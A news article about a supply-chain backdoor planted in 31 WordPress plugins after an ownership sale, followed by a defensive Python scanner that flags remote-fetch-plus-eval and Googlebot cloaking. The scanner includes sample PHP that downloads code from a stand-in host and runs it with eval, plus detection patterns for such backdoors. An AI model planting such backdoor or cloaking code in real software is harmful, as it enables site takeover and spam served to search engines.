Backdoors discovered in 31 WordPress plugins, added in updates after ownership transfer.

Web engineer Austin Ginder has published a blog post detailing how backdoors were embedded in 31 plugins owned by Essential Plugin, a company that develops WordPress plugins.
Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them.

Ginder received a call from a customer who told him, 'The WordPress.org plugin team has warned that the Countdown Timer Ultimate plugin contains code that could allow unauthorized access by third parties,' and he began an investigation.
Although a forced update pushed by WordPress.org had removed the malicious code from the plugin, unauthorized access had already taken place: wp-config.php, WordPress's core configuration file, had been rewritten so that fake pages and spam links were served to Googlebot.
Ginder decided to repair the compromised files and to investigate how the malicious code had ended up in the plugin.

Essential Plugin, the developer of Countdown Timer Ultimate, is an India-based team that offers more than 30 plugins. The plugins are free in their basic form, with paid versions that add advanced customization options.
However, due to a roughly 40% decrease in revenue following the COVID-19 pandemic, founder Minesh Shah decided to sell Essential Plugin in 2025 and listed it on the online business marketplace Flippa. The business was purchased by Chris, who has experience in SEO, cryptocurrency, and online gambling marketing, and the purchase price was in the 'six figures' (over $100,000, or approximately 16 million yen).
From Plugin to Payday: How To Sell a WordPress Plugin Business for 6-Figures on Flippa - Flippa

Ownership of the plugins appears to have been transferred to Chris around May 2025, and the new owner's first update was released on August 8, 2025. According to Ginder's investigation, the backdoor was planted in this first update: it fetched code directly from an attacker-controlled server and executed it, a textbook remote code execution backdoor.
The backdoor shipped on August 8, 2025 and remained dormant for approximately eight months. Around April 5, 2026, it began to be exploited, with actions such as rewriting the wp-config.php file. On April 7, 2026, the WordPress.org plugin team deactivated the 31 plugins owned by Essential Plugin to prevent further damage.
Separately, on March 31, 2026, Ginder discovered another instance of malicious code being injected into a plugin that had changed ownership, and warned that 'the WordPress ecosystem lacks mechanisms to monitor or notify when plugin ownership is transferred, creating an environment where supply chain attacks are easily carried out.'
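As an added, defender-side example (not code from Ginder's post or from the affected plugins), here is a small heuristic scanner for the two behaviours described above: plugin code that fetches remote content and executes it, and output served only to Googlebot. The regular expressions and the sample PHP snippets are constructed assumptions, not the real indicators from this incident.

```python
import re
from pathlib import Path

# Heuristic indicators for the behaviour the article describes: a plugin that
# fetches code from a remote server and executes it, and content served only to
# Googlebot (cloaking). The patterns are assumed for illustration and are not
# the actual indicators from the Essential Plugin incident.
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|curl_exec|wp_remote_(get|post|retrieve_body))\s*\(", re.I)
DYNAMIC_EXEC = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
GOOGLEBOT_CLOAK = re.compile(r"HTTP_USER_AGENT[^;]{0,200}googlebot", re.I)

def scan_php(source: str) -> list:
    """Return human-readable findings for one PHP source file."""
    findings = []
    if REMOTE_FETCH.search(source) and DYNAMIC_EXEC.search(source):
        findings.append("remote fetch combined with dynamic code execution")
    if GOOGLEBOT_CLOAK.search(source):
        findings.append("user-agent check singling out Googlebot (possible cloaking)")
    return findings

def scan_plugin_dir(path: str) -> dict:
    """Scan every .php file below `path`; keys are files with findings."""
    report = {}
    for php in Path(path).rglob("*.php"):
        hits = scan_php(php.read_text(errors="replace"))
        if hits:
            report[str(php)] = hits
    return report

# Constructed samples (not code from the affected plugins).
SAMPLE_BACKDOOR = """<?php
add_action('init', function () {
    $r = wp_remote_get('https://example.invalid/payload.txt');
    if (!is_wp_error($r)) { eval(wp_remote_retrieve_body($r)); }
});
"""
SAMPLE_CLOAK = """<?php
if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) {
    readfile('/tmp/.cache/spam.html'); exit;
}
"""
SAMPLE_CLEAN = """<?php
function ctu_render() { return esc_html(get_option('ctu_text', '')); }
"""

if __name__ == "__main__":
    for name, src in [("backdoor", SAMPLE_BACKDOOR), ("cloak", SAMPLE_CLOAK), ("clean", SAMPLE_CLEAN)]:
        print(name, scan_php(src) or ["no findings"])
```

Treat hits as leads to read by hand rather than verdicts; a scanner like this only narrows down which files to review after an ownership change or an unexpected update.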